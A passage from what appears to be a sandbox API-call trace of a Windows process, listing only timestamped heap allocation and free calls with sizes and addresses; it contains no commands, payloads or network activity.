dwFlags=0x0, lpMem=0x49d940 | out: hHeap=0x450000) returned 1 [0149.030] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46a330 | out: hHeap=0x450000) returned 1 [0149.030] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x640) returned 0x468910 [0149.030] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1247) returned 0x49d940 [0149.030] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4693e0 | out: hHeap=0x450000) returned 1 [0149.030] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468910 | out: hHeap=0x450000) returned 1 [0149.030] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x520) returned 0x468910 [0149.030] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1b56) returned 0x4693e0 [0149.030] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49d940 | out: hHeap=0x450000) returned 1 [0149.031] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468910 | out: hHeap=0x450000) returned 1 [0149.031] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8a0) returned 0x49d940 [0149.031] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28ed) returned 0x46af40 [0149.031] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4693e0 | out: hHeap=0x450000) returned 1 [0149.031] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49d940 | out: hHeap=0x450000) returned 1 [0149.031] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x550) returned 0x468910 [0149.031] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468910 | out: hHeap=0x450000) returned 1 [0149.031] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2537) returned 0x49d940 [0149.031] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x12b7) returned 0x4693e0 [0149.031] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x950) returned 0x46d840 [0149.032] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49d940 | out: hHeap=0x450000) returned 1 [0149.032] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4693e0 | out: hHeap=0x450000) returned 1 [0149.032] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x3d4f) returned 0x46e1a0 [0149.032] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46af40 | out: hHeap=0x450000) returned 1 [0149.032] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46d840 | out: hHeap=0x450000) returned 1 [0149.032] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2377) returned 0x49d940 [0149.032] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x11d7) returned 0x471f00 [0149.033] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8e0) returned 0x4693e0 [0149.033] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49d940 | out: hHeap=0x450000) returned 1 [0149.033] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x471f00 | out: hHeap=0x450000) returned 1 [0149.033] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4693e0 | out: hHeap=0x450000) returned 1 [0149.033] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x5b0) returned 0x468910 [0149.033] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468910 | out: hHeap=0x450000) returned 1 [0149.033] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x640) returned 0x468910 [0149.033] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x5be2) returned 0x47db40 [0149.034] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46e1a0 | out: hHeap=0x450000) returned 1 [0149.034] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468910 | out: hHeap=0x450000) returned 1 [0149.034] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x890) returned 0x49d940 [0149.034] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49d940 | out: hHeap=0x450000) returned 1 [0149.034] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xac0) returned 0x49d940 [0149.034] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49d940 | out: hHeap=0x450000) returned 1 [0149.034] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x45b4d0 [0149.034] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x960) returned 0x49d940 [0149.034] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x960) returned 0x49e2b0 [0149.034] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49d940 | out: hHeap=0x450000) returned 1 [0149.034] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x460) returned 0x468910 [0149.035] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xe0f) returned 0x49ec20 [0149.035] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49e2b0 | out: hHeap=0x450000) returned 1 [0149.035] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468910 | out: hHeap=0x450000) returned 1 [0149.035] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c17) returned 0x483730 [0149.035] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xe00) returned 0x49d940 [0149.035] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x700) returned 0x485350 [0149.035] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x483730 | out: hHeap=0x450000) returned 1 [0149.036] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49d940 | out: hHeap=0x450000) returned 1 [0149.036] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x153d) returned 0x483730 [0149.036] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49ec20 | out: hHeap=0x450000) returned 1 [0149.036] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x485350 | out: hHeap=0x450000) returned 1 [0149.036] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2277) returned 0x49d940 [0149.036] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1157) returned 0x484c80 [0149.036] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8a0) returned 0x485de0 [0149.037] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49d940 | out: hHeap=0x450000) returned 1 [0149.037] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x484c80 | out: hHeap=0x450000) returned 1 [0149.037] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1fc7) returned 0x49d940 [0149.037] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x483730 | out: hHeap=0x450000) returned 1 [0149.037] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x485de0 | out: hHeap=0x450000) returned 1 [0149.037] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1657) returned 0x483730 [0149.037] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xb20) returned 0x484d90 [0149.037] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x590) returned 0x49f910 [0149.038] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x483730 | out: hHeap=0x450000) returned 1 [0149.038] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x484d90 | out: hHeap=0x450000) returned 1 [0149.038] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2f96) returned 0x483730 [0149.038] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49d940 | out: hHeap=0x450000) returned 1 [0149.038] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49f910 | out: hHeap=0x450000) returned 1 [0149.038] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2b47) returned 0x4866d0 [0149.039] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x15b7) returned 0x49d940 [0149.039] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xad0) returned 0x49ef00 [0149.040] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4866d0 | out: hHeap=0x450000) returned 1 [0149.040] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49d940 | out: hHeap=0x450000) returned 1 [0149.040] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49ef00 | out: hHeap=0x450000) returned 1 [0149.040] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2697) returned 0x4866d0 [0149.040] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1367) returned 0x49d940 [0149.041] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x9a0) returned 0x49ecb0 [0149.041] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4866d0 | out: hHeap=0x450000) returned 1 [0149.041] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49d940 | out: hHeap=0x450000) returned 1 [0149.041] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x474d) returned 0x4866d0 [0149.041] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x483730 | out: hHeap=0x450000) returned 1 [0149.041] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49ecb0 | out: hHeap=0x450000) returned 1 [0149.041] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x920) returned 0x49d940 [0149.041] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49d940 | out: hHeap=0x450000) returned 1 [0149.041] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1b47) returned 0x49d940 [0149.041] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xd90) returned 0x48ae30 [0149.043] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x6d0) returned 0x49f490 [0149.043] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49d940 | out: hHeap=0x450000) returned 1 [0149.043] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x48ae30 | out: hHeap=0x450000) returned 1 [0149.043] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49f490 | out: hHeap=0x450000) returned 1 [0149.043] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x5d0) returned 0x468910 [0149.044] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x6adf) returned 0x4693e0 [0149.044] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4866d0 | out: hHeap=0x450000) returned 1 [0149.044] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468910 | out: hHeap=0x450000) returned 1 [0149.044] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1887) returned 0x49d940 [0149.044] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc30) returned 0x49f1d0 [0149.044] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x620) returned 0x468910 [0149.044] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49d940 | out: hHeap=0x450000) returned 1 [0149.044] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49f1d0 | out: hHeap=0x450000) returned 1 [0149.044] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468910 | out: hHeap=0x450000) returned 1 [0149.044] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8f0) returned 0x49d940 [0149.044] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x480) returned 0x468910 [0149.045] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x240) returned 0x49e240 [0149.045] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49d940 | out: hHeap=0x450000) returned 1 [0149.045] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468910 | out: hHeap=0x450000) returned 1 [0149.045] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49e240 | out: hHeap=0x450000) returned 1 [0149.045] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4604f0 [0149.045] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45b4d0 | out: hHeap=0x450000) returned 1 [0149.045] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x47db40 | out: hHeap=0x450000) returned 1 [0149.046] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4693e0 | out: hHeap=0x450000) returned 1 [0149.047] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4604f0 | out: hHeap=0x450000) returned 1 [0149.047] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x9900) returned 0x4693e0 [0149.047] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1bf0) returned 0x49d940 [0149.050] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49d940 | out: hHeap=0x450000) returned 1 [0149.050] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x9937) returned 0x47db40 [0149.051] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4693e0 | out: hHeap=0x450000) returned 1 [0149.051] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x45b4d0 [0149.051] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x9900) returned 0x4693e0 [0149.051] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1bf0) returned 0x49d940 [0149.052] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x49d940 | out: hHeap=0x450000) returned 1 [0149.052] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x9937) returned 0x49d940 [0149.053] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4693e0 | out: hHeap=0x450000) returned 1 [0149.054] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x460540 [0149.054] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45b4d0 | out: hHeap=0x450000) returned 1 [0149.054] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x473790 | out: hHeap=0x450000) returned 1 [0149.054] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x48da40 | out: hHeap=0x450000) returned 1 [0149.055] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x460590 | out: hHeap=0x450000) returned 1 [0149.055] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x4693e0 [0149.055] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x487480 [0149.055] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x458d80 [0149.055] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x4a7280 [0149.056] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4690c0 [0149.056] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x458d80 | out: hHeap=0x450000) returned 1 [0149.056] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x4ba490 [0149.056] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x469100 [0149.056] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4690c0 | out: hHeap=0x450000) returned 1 [0149.056] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x4cd6a0 [0149.057] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x45b4d0 [0149.057] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x469100 | out: hHeap=0x450000) returned 1 [0149.057] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x4e08b0 [0149.057] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x30) returned 0x468390 [0149.057] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45b4d0 | out: hHeap=0x450000) returned 1 [0149.057] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x4f3ac0 [0149.058] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x506cd0 [0149.058] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x48) returned 0x460680 [0149.058] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468390 | out: hHeap=0x450000) returned 1 [0149.058] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x519ee0 [0149.059] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x52d0f0 [0149.059] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x1ef0080 [0149.060] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x68) returned 0x458d80 [0149.060] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x460680 | out: hHeap=0x450000) returned 1 [0149.060] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x1f03290 [0149.060] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x1f164a0 [0149.061] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x1f296b0 [0149.209] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x1f3c8c0 [0149.209] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x98) returned 0x4550b0 [0149.209] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x458d80 | out: hHeap=0x450000) returned 1 [0149.209] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x1f4fad0 [0149.210] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x1f62ce0 [0149.210] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x1f75ef0 [0149.211] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x1f89100 [0149.211] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x1f9c310 [0149.212] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x1faf520 [0149.212] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xe0) returned 0x454ce0 [0149.212] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4550b0 | out: hHeap=0x450000) returned 1 [0149.212] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x1fc2730 [0149.213] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x1ff0080 [0149.214] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2003290 [0149.214] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x20164a0 [0149.215] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x20296b0 [0149.215] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x203c8c0 [0149.216] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x204fad0 [0149.216] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2062ce0 [0149.217] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2075ef0 [0149.217] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x150) returned 0x45b0b0 [0149.217] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x454ce0 | out: hHeap=0x450000) returned 1 [0149.217] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2089100 [0149.218] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x209c310 [0149.218] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x20af520 [0149.219] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x20c2730 [0149.219] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x20d5940 [0149.220] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x20e8b50 [0149.220] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x20fbd60 [0149.221] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x210ef70 [0149.221] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2122180 [0149.222] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2135390 [0149.222] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x21485a0 [0149.223] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x215b7b0 [0149.223] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x216e9c0 [0149.224] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2181bd0 [0149.224] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1f8) returned 0x468910 [0149.224] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x45b0b0 | out: hHeap=0x450000) returned 1 [0149.224] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2194de0 [0149.224] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x21a7ff0 [0149.225] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x21bb200 [0149.225] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x21ce410 [0149.226] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x21f0080 [0149.227] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2203290 [0149.227] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x22164a0 [0149.228] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x22296b0 [0149.228] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x223c8c0 [0149.229] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x224fad0 [0149.229] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2262ce0 [0149.229] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2275ef0 [0149.230] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2289100 [0149.230] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x229c310 [0149.231] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x22af520 [0149.231] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x22c2730 [0149.232] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x22d5940 [0149.232] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x22e8b50 [0149.233] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x22fbd60 [0149.233] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x230ef70 [0149.234] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2322180 [0149.234] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2f0) returned 0x468b10 [0149.234] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468910 | out: hHeap=0x450000) returned 1 [0149.234] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2335390 [0149.235] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x23485a0 [0149.236] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x235b7b0 [0149.236] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x236e9c0 [0149.237] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2381bd0 [0149.237] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2394de0 [0149.237] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x23a7ff0 [0149.237] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x23bb200 [0149.238] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x23ce410 [0149.239] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x23e1620 [0149.239] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x23f4830 [0149.240] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2407a40 [0149.240] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x241ac50 [0149.240] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x242de60 [0149.241] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2441070 [0149.241] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2454280 [0149.242] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2467490 [0149.242] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x247a6a0 [0149.243] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x248d8b0 [0149.364] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x24a0ac0 [0149.364] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x24b3cd0 [0149.365] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x24c6ee0 [0149.365] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x24da0f0 [0149.366] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x24ed300 [0149.366] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2500510 [0149.367] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2513720 [0149.367] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2526930 [0149.368] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2539b40 [0149.368] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x254cd50 [0149.368] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x255ff60 [0149.369] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2573170 [0149.369] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x468) returned 0x47c5f0 [0149.369] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x468b10 | out: hHeap=0x450000) returned 1 [0149.369] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2586380 [0149.370] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2599590 [0149.370] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x25ac7a0 [0149.371] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x25bf9b0 [0149.371] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x25d2bc0 [0149.371] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x25f0080 [0149.373] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x2603290 [0149.374] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x26164a0 [0149.374] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 0x26296b0 [0149.375] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x13200) returned 